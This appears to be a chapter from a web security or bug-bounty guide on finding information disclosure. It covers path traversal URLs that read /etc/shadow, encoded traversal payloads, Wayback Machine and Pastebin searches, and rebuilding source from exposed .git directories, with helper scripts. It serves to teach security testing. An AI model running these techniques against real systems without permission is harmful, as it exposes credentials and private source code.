Hunting for Information Disclosure
You can use several strategies to find information disclosure vulnerabilities, depending on the application you’re targeting and what you’re looking for. A good starting point is to look for software version numbers and configuration information by using the recon techniques introduced in Chapter 5. Then you can start to look for exposed configuration files, database files, and other sensitive files that were uploaded to the production server and left unprotected. The following steps discuss some techniques you can attempt.
Step 1: Attempt a Path Traversal Attack
Start by trying a path traversal attack to read the server’s sensitive files. Path traversal attacks are used to access files outside the web application’s root folder. This process involves manipulating filepath variables the application uses to reference files by adding the ../ characters to them. This sequence refers to the parent directory of the current directory in Unix systems, so by adding it to a filepath, you can often reach files outside the web root.
For example, let’s say a website allows you to load an image in the application’s image folder by using a relative URL. An absolute URL contains an entire address, from the URL protocol to the domain name and pathnames of the resource. Relative URLs, on the other hand, contain only a part of the full URL. Most contain only the path or filename of the resource. Relative URLs are used to link to another location on the same domain.
This URL, for example, will redirect users to https://example.com/images/1.png:
https://example.com/image?url=/images/1.png
In this case, the url parameter contains a relative URL (/images/1.png) that references files within the web application root. You can insert the ../ sequence to try to navigate out of the images folder and out of the web root. For instance, the following URL refers to the index.html file at the web application’s root folder (and out of the images folder):
https://example.com/image?url=/images/../index.html
Similarly, this one will access the /etc/shadow file under the server’s root directory, which is a file that stores a list of the system’s user accounts and their hashed passwords:
https://example.com/image?url=/images/../../../../../../../etc/shadow
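To see why these URLs reach files outside the images folder, the following Python sketch mimics a server that naively appends the url parameter to its web root. The web root /var/www/html and the helper names resolve and escapes_web_root are assumptions made for illustration; the real server's layout is unknown.

```python
import posixpath

WEB_ROOT = "/var/www/html"  # hypothetical web root, assumed for illustration


def resolve(url_param: str) -> str:
    """Resolve a user-supplied relative URL the way a naive server might."""
    # Plain concatenation followed by normalization collapses each "../".
    return posixpath.normpath(WEB_ROOT + url_param)


def escapes_web_root(url_param: str) -> bool:
    """Return True if the resolved path lands outside the web root."""
    resolved = resolve(url_param)
    return not (resolved == WEB_ROOT or resolved.startswith(WEB_ROOT + "/"))


for param in (
    "/images/1.png",
    "/images/../index.html",
    "/images/../../../../../../../etc/shadow",
):
    print(param, "->", resolve(param), "| escapes:", escapes_web_root(param))
```

Extra ../ sequences beyond the filesystem root are simply dropped during normalization, which is why overshooting the required number still works.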
It might take some trial and error to determine how many ../ sequences you need to reach the system’s root directory. Also, if the application implements some sort of input validation and doesn’t allow ../ in the filepath, you can use encoded variations of ../, such as %2e%2e%2f (URL encoding), %252e%252e%252f (double URL encoding), and ..%2f (partial URL encoding).
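As a rough sketch of how you might generate these variants for testing, the Python snippet below builds the plain, URL-encoded, double-encoded, and partially encoded forms of a traversal payload. The function names and the dictionary keys are hypothetical, chosen only for this example.

```python
from urllib.parse import quote


def encode_all(text: str) -> str:
    """Percent-encode every ASCII character, including '.', which quote() leaves alone."""
    return "".join(f"%{ord(ch):02x}" for ch in text)


def traversal_variants(target: str, depth: int) -> dict[str, str]:
    """Build ../ payloads in several encodings for a target file path."""
    suffix = target.lstrip("/")
    url_step = encode_all("../")             # %2e%2e%2f
    double_step = quote(url_step, safe="")   # %252e%252e%252f
    partial_step = "..%2f"                   # only the slash is encoded
    return {
        "plain": "../" * depth + suffix,
        "url": url_step * depth + suffix,
        "double": double_step * depth + suffix,
        "partial": partial_step * depth + suffix,
    }


for name, payload in traversal_variants("/etc/passwd", 3).items():
    print(f"{name:8} {payload}")
```

You would then substitute each payload into the vulnerable parameter and increase depth until the response changes.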
Step 2: Search the Wayback Machine
Another way to find exposed files is by using the Wayback Machine. Introduced in Chapter 5, the Wayback Machine is an online archive of what websites looked like at various points in time. You can use it to find hidden and deprecated endpoints, as well as large numbers of current endpoints without actively crawling the site, making it a good first look into what the application might be exposing.
On the Wayback Machine’s site, simply search for a domain to see its past versions. To search for a domain’s files, visit https://web.archive.org/web/*/DOMAIN.
Add a /* to this URL to get the archived URLs related to the domain as a list. For example, https://web.archive.org/web/*/example.com/* will return a list of URLs related to example.com. You should see the URLs displayed on the Wayback Machine web page (Figure 21-1).
You can then use the search function to see whether any sensitive pages have been archived. For example, to look for admin pages, search for the term /admin in the found URLs (Figure 21-2).
You can also search for backup files and configuration files by using common file extensions like .conf (Figure 21-3) and .env, or look for source code, like JavaScript or PHP files, by using the file extensions .js and .php.
Download interesting archived pages and look for any sensitive info. For example, are there any hardcoded credentials that are still in use, or does the page leak any hidden endpoints that normal users shouldn’t know about?
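If you would rather script this search than use the web page, one option is the Wayback Machine's CDX endpoint, which returns archived URLs in a machine-readable form. The sketch below only builds the query URL and filters a list of results; the query parameters reflect my understanding of the CDX interface and should be checked against its documentation, and the watch lists and function names are hypothetical.

```python
from urllib.parse import urlencode, urlsplit

# Hypothetical watch lists; extend them for your target.
SENSITIVE_EXTENSIONS = (".conf", ".env", ".js", ".php")
SENSITIVE_KEYWORDS = ("/admin",)


def cdx_query_url(domain: str) -> str:
    """Build a CDX query that lists archived URLs under a domain."""
    params = {
        "url": f"{domain}/*",
        "fl": "original",      # ask for the original URL column only
        "collapse": "urlkey",  # drop repeated captures of the same URL
        "output": "json",
    }
    return "https://web.archive.org/cdx/search/cdx?" + urlencode(params)


def interesting(urls: list[str]) -> list[str]:
    """Keep URLs whose path matches a watched extension or keyword."""
    hits = []
    for url in urls:
        path = urlsplit(url).path.lower()
        if path.endswith(SENSITIVE_EXTENSIONS) or any(k in path for k in SENSITIVE_KEYWORDS):
            hits.append(url)
    return hits


print(cdx_query_url("example.com"))
```

Fetch the printed URL with your HTTP client of choice, pass the returned URLs to interesting(), and review the hits by hand.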
Step 3: Search Paste Dump Sites
Next, look into paste dump sites like Pastebin and GitHub gists. These let users share text documents via a direct link rather than via email or services like Google Docs, so developers often use them to send source code, configuration files, and log files to their coworkers. But on a site like Pastebin, for example, shared text files are public by default. If developers upload a sensitive file, everyone will be able to read it. For this reason, these code-sharing sites are pretty infamous for leaking credentials like API keys and passwords.
Pastebin has an API that allows users to search for public paste files by using a keyword, email, or domain name. You can use this API to find sensitive files that belong to a certain organization. Tools like PasteHunter or pastebin-scraper can also automate the process. Pastebin-scraper (https://github.com/streaak/pastebin-scraper/) uses the Pastebin API to help you search for paste files. This tool is a shell script, so download it to a local directory and run the following command to search for public paste files associated with a particular keyword. The -g option indicates a general keyword search:
./scrape.sh -g KEYWORD
This command will return a list of Pastebin file IDs associated with the specified KEYWORD. You can access the returned paste files by going to pastebin.com/ID.
Step 4: Reconstruct Source Code from an Exposed .git Directory
Another way of finding sensitive files is to reconstruct source code from an exposed .git directory. When attacking an application, obtaining its source code can be extremely helpful for constructing an exploit. This is because some bugs, like SQL injections, are way easier to find through static code analysis than black-box testing. Chapter 22 covers how to review code for vulnerabilities.
When a developer uses Git to version-control a project’s source code, Git will store all of the project’s version-control information, including the commit history of project files, in a Git directory. Normally, this .git folder shouldn’t be accessible to the public, but sometimes it’s accidentally made available. This is when information leaks happen. When a .git directory is exposed, attackers can obtain an application’s source code and therefore gain access to developer comments, hardcoded API keys, and other sensitive data via secret scanning tools like truffleHog (https://github.com/dxa4481/truffleHog/) or Gitleaks (https://github.com/zricethezav/gitleaks/).
Checking Whether a .git Folder Is Public
To check whether an application’s .git folder is public, simply go to the application’s root directory (for example, example.com) and add /.git to the URL:
https://example.com/.git
Three things could happen when you browse to the /.git directory. If you get a 404 error, this means the application’s .git directory isn’t made available to the public, and you won’t be able to leak information this way. If you get a 403 error, the .git directory is available on the server, but you won’t be able to directly access the folder’s root, and therefore won’t be able to list all the files contained in the directory. If you don’t get an error and the server responds with the directory listing of the .git directory, you can directly browse the folder’s contents and retrieve any information contained in it.
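The three outcomes can be summarized as a small decision function. This is only a sketch: the function name is hypothetical, and detecting a directory listing by looking for the text "Index of" in the response body is an assumption based on the default listing pages of common web servers, so a custom listing page would need a different check.

```python
def classify_git_exposure(status_code: int, body: str = "") -> str:
    """Map the response for /.git to one of the outcomes described above."""
    if status_code == 404:
        # The directory is not served at all.
        return "not exposed"
    if status_code == 403:
        # The directory exists, but its listing cannot be read directly.
        return "present, listing forbidden"
    if status_code == 200 and "Index of" in body:
        # Assumed marker of an auto-generated directory listing.
        return "directory listing enabled"
    return "inconclusive"


print(classify_git_exposure(403))
```

An "inconclusive" result (for example, a redirect or a custom error page served with status 200) deserves a manual look before you rule the target out.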
Downloading Files
If directory listing is enabled, you can browse through the files and retrieve the leaked information. The wget command retrieves content from web servers. You can use wget in recursive mode (-r) to mass-download all files stored within the specified directory and its subdirectories:
$ wget -r example.com/.git
But if directory listing isn’t enabled and the directory’s files are not shown, you can still reconstruct the entire .git directory. First, you’ll need to confirm that the folder’s contents are indeed available to the public. You can do this by trying to access the directory’s config file:
$ curl https://example.com/.git/config
If this file is accessible, you might be able to download the Git directory’s entire contents so long as you understand the general structure of .git directories. A .git directory is laid out in a specific way. When you execute the following command in a Git repository, you should see contents resembling the following:
$ ls .git
COMMIT_EDITMSG HEAD branches config description hooks index info logs objects refs
The output shown here lists a few standard files and folders that are important for reconstructing the project’s source. In particular, the /objects directory is used to store Git objects. This directory contains additional folders; each has a two-character name corresponding to the first two characters of the SHA1 hash of the Git objects stored in it. Within these subdirectories, you’ll find files named after the remaining 38 characters of the SHA1 hash of the Git object each file stores. In other words, the Git object with a hash of 0a082f2656a655c8b0a87956c7bcdc93dfda23f8 will be stored with the filename of 082f2656a655c8b0a87956c7bcdc93dfda23f8 in the directory .git/objects/0a. For example, the following command will return a list of folders:
$ ls .git/objects
00 0a 14 5a 64 6e 82 8c 96 a0 aa b4 be c8 d2 dc e6 f0 fa info pack
And this command will reveal the Git objects stored in a particular folder:
$ ls .git/objects/0a
082f2656a655c8b0a87956c7bcdc93dfda23f8 4a1ee2f3a3d406411a72e1bea63507560092bd 66452433322af3d319a377415a890c70bbd263 8c20ea4482c6d2b0c9cdaf73d4b05c2c8c44e9 ee44c60c73c5a622bb1733338d3fa964b333f0
0ec99d617a7b78c5466daa1e6317cbd8ee07cc 52113e4f248648117bc4511da04dd4634e6753 72e6850ef963c6aeee4121d38cf9de773865d8
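The mapping from an object hash to its location on disk is mechanical, so it is easy to script. A minimal Python sketch follows; the function name object_path is an assumption for this example, and it covers only loose objects, not objects stored in the pack folder.

```python
import re


def object_path(sha1: str) -> str:
    """Return the loose-object path for a 40-character SHA1 hash."""
    if not re.fullmatch(r"[0-9a-f]{40}", sha1):
        raise ValueError(f"not a 40-character hex SHA1: {sha1!r}")
    # The first two characters name the folder; the remaining 38 name the file.
    return f".git/objects/{sha1[:2]}/{sha1[2:]}"


print(object_path("0a082f2656a655c8b0a87956c7bcdc93dfda23f8"))
```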
Git stores different types of objects in .git/objects: commits, trees, blobs, and annotated tags. You can determine an object’s type by using this command:
$ git cat-file -t OBJECT-HASH
Commit objects store information such as the commit’s tree object hash, parent commit, author, committer, date, and message of a commit. Tree objects contain the directory listings for commits. Blob objects contain copies of files that were committed (read: actual source code!). Finally, tag objects contain information about tagged objects and their associated tag names. You can display the file associated with a Git object by using the following command:
$ git cat-file -p OBJECT-HASH
The /config file is the Git configuration file for the project, and the /HEAD file contains a reference to the current branch:
$ cat .git/HEAD
ref: refs/heads/master
If you can’t access the /.git folder’s directory listing, you have to download each file you want instead of recursively downloading from the directory root. But how do you find out which files on the server are available when object files have complex paths, such as .git/objects/0a/72e6850ef963c6aeee4121d38cf9de773865d8?
You start with filepaths that you already know exist, like .git/HEAD! Reading this file will give you a reference to the current branch (for example, .git/refs/heads/master) that you can use to find more files on the system:
$ cat .git/HEAD
ref: refs/heads/master
$ cat .git/refs/heads/master
0a66452433322af3d319a377415a890c70bbd263
$ git cat-file -t 0a66452433322af3d319a377415a890c70bbd263
commit
$ git cat-file -p 0a66452433322af3d319a377415a890c70bbd263
tree 0a72e6850ef963c6aeee4121d38cf9de773865d8
The .git/refs/heads/master file contains the hash of the commit object at the tip of that branch. From there, you can see that the object is a commit and is associated with a tree object, 0a72e6850ef963c6aeee4121d38cf9de773865d8, which stores the directory tree of the commit. Now examine that tree object:
$ git cat-file -p 0a72e6850ef963c6aeee4121d38cf9de773865d8
100644 blob 6ad5fb6b9a351a77c396b5f1163cc3b0abcde895 .gitignore
100644 blob 4b66088945aab8b967da07ddd8d3cf8c47a3f53c source.py
100644 blob 9a3227dca45b3977423bb1296bbc312316c2aa0d README
040000 tree 3b1127d12ee43977423bb1296b8900a316c2ee32 resources
Bingo! You discover some source code files and additional object trees to explore.
On a remote server, your requests to discover the different files would look a little different. For instance, you can use this URL to determine the HEAD:
https://example.com/.git/HEAD
Use this URL to find the object stored in that HEAD:
https://example.com/.git/refs/heads/master
Use this URL to access the tree associated with the commit:
https://example.com/.git/objects/0a/72e6850ef963c6aeee4121d38cf9de773865d8
Finally, use this URL to download the source code stored in the source.py file:
https://example.com/.git/objects/4b/66088945aab8b967da07ddd8d3cf8c47a3f53c
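The sequence of requests above can be derived step by step from what each file contains. The following Python sketch works out the next URL to request from the contents of HEAD and builds object URLs from hashes. The function names are hypothetical, and the handling of a HEAD file that holds a bare hash (a detached HEAD) goes slightly beyond the example in the text.

```python
import re

SHA1_RE = re.compile(r"[0-9a-f]{40}")


def object_url(base_url: str, sha1: str) -> str:
    """Build the URL of a loose object on the remote server."""
    return f"{base_url.rstrip('/')}/.git/objects/{sha1[:2]}/{sha1[2:]}"


def next_url_from_head(base_url: str, head_text: str) -> str:
    """Given the contents of .git/HEAD, return the next URL to request."""
    content = head_text.strip()
    if content.startswith("ref: "):
        # Symbolic ref, e.g. "ref: refs/heads/master": fetch the branch file next.
        return f"{base_url.rstrip('/')}/.git/{content[len('ref: '):]}"
    if SHA1_RE.fullmatch(content):
        # Detached HEAD: the file already holds a commit hash.
        return object_url(base_url, content)
    raise ValueError(f"unrecognized HEAD contents: {content!r}")


print(next_url_from_head("https://example.com", "ref: refs/heads/master\n"))
print(object_url("https://example.com", "4b66088945aab8b967da07ddd8d3cf8c47a3f53c"))
```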
If you are downloading files from a remote server, you’ll also need to decompress each downloaded object file before you can read it, because Git stores these objects zlib-compressed. You can decompress the object file by using Ruby, Python, or your preferred language’s zlib library:
ruby -rzlib -e 'print Zlib::Inflate.new.inflate(STDIN.read)' < OBJECT_FILE
python3 -c 'import sys, zlib; print(repr(zlib.decompress(sys.stdin.buffer.read())))' < OBJECT_FILE
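Once decompressed, a loose object consists of a short header (the object type, a space, the content size, and a NUL byte) followed by the content itself. The sketch below, with hypothetical function names, splits off that header and also decodes the binary entries of a tree object, which is what you need in order to find the hashes of further objects to download without a local git cat-file.

```python
import zlib


def parse_loose_object(raw: bytes) -> tuple[str, bytes]:
    """Decompress a loose object and split it into (type, content)."""
    data = zlib.decompress(raw)
    header, _, body = data.partition(b"\x00")
    obj_type, size = header.decode("ascii").split(" ")
    if int(size) != len(body):
        raise ValueError("size in header does not match content length")
    return obj_type, body


def parse_tree(body: bytes) -> list[tuple[str, str, str]]:
    """Decode tree content into (mode, name, sha1) entries."""
    entries = []
    pos = 0
    while pos < len(body):
        space = body.index(b" ", pos)      # end of the mode field
        nul = body.index(b"\x00", space)   # end of the file name
        mode = body[pos:space].decode("ascii")
        name = body[space + 1:nul].decode("utf-8", "replace")
        sha1 = body[nul + 1:nul + 21].hex()  # 20 raw bytes of SHA1
        entries.append((mode, name, sha1))
        pos = nul + 21
    return entries


# Self-contained demonstration using an object built in memory.
demo = zlib.compress(b"blob 5\x00hello")
print(parse_loose_object(demo))
```

In raw tree content, directory entries carry the mode 40000 without the leading zero that git cat-file -p prints.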
After recovering the project’s source code, you can grep for sensitive data such as hardcoded credentials, encryption keys, and developer comments. If you have time, you can browse through the entire recovered codebase to conduct a source code review and find potential vulnerabilities.
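If you prefer a script to ad hoc grep commands, a keyword scan might look like the sketch below. The patterns are illustrative assumptions, not a complete rule set; dedicated secret scanners ship far more thorough rules.

```python
import re

# Illustrative patterns only; tune them for the codebase you recovered.
SECRET_PATTERNS = {
    "password": re.compile(r"pass(word|wd)?\s*[:=]\s*['\"][^'\"]+['\"]", re.I),
    "api_key": re.compile(r"api[_-]?key\s*[:=]\s*['\"][^'\"]+['\"]", re.I),
    "private_key": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}


def scan_text(text: str) -> list[tuple[int, str, str]]:
    """Return (line number, pattern label, line) for each suspicious line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for label, pattern in SECRET_PATTERNS.items():
            if pattern.search(line):
                findings.append((lineno, label, line.strip()))
    return findings


sample = 'DB_PASSWORD = "hunter2"\nprint("hi")\napi_key: "abc123"\n'
for finding in scan_text(sample):
    print(finding)
```

Treat every hit as a lead to verify by hand, since placeholder values and test fixtures match these patterns too.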
Step 5: Find Information in Public Files
You could also try to find information leaks in the application’s public files, such as its HTML and JavaScript source code. In my experience, JavaScript files are a rich source of information leaks!
Browse the web application that you’re targeting as a regular user and take note of where the application displays or uses your personal information. Then right-click those pages and click View page source. You should see the HTML source code of the current page. Follow the links on this page to find other HTML files and JavaScript files the application is using. Then grep each HTML and JavaScript file you found for hardcoded credentials, API keys, and personal information, using keywords like password and api_key.
You can also locate JavaScript files on a site by using tools like LinkFinder (https://github.com/GerbenJavado/LinkFinder/).
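For a single page, following the links by hand can also be approximated with Python's standard HTML parser. The sketch below collects script sources and anchor targets from a page's HTML and resolves them against the page URL. The class and function names are hypothetical, and it only sees links present in the static HTML, not ones added by JavaScript at runtime.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin


class LinkCollector(HTMLParser):
    """Collect absolute URLs of scripts and links found in a page."""

    def __init__(self, base_url: str):
        super().__init__()
        self.base_url = base_url
        self.scripts: list[str] = []
        self.links: list[str] = []

    def handle_starttag(self, tag, attrs):
        attr_map = dict(attrs)
        if tag == "script" and attr_map.get("src"):
            self.scripts.append(urljoin(self.base_url, attr_map["src"]))
        elif tag == "a" and attr_map.get("href"):
            self.links.append(urljoin(self.base_url, attr_map["href"]))


def collect_links(base_url: str, html: str) -> tuple[list[str], list[str]]:
    """Return (script URLs, link URLs) for the given page source."""
    collector = LinkCollector(base_url)
    collector.feed(html)
    return collector.scripts, collector.links


page = '<html><script src="/static/app.js"></script><a href="settings">Settings</a></html>'
print(collect_links("https://example.com/account/", page))
```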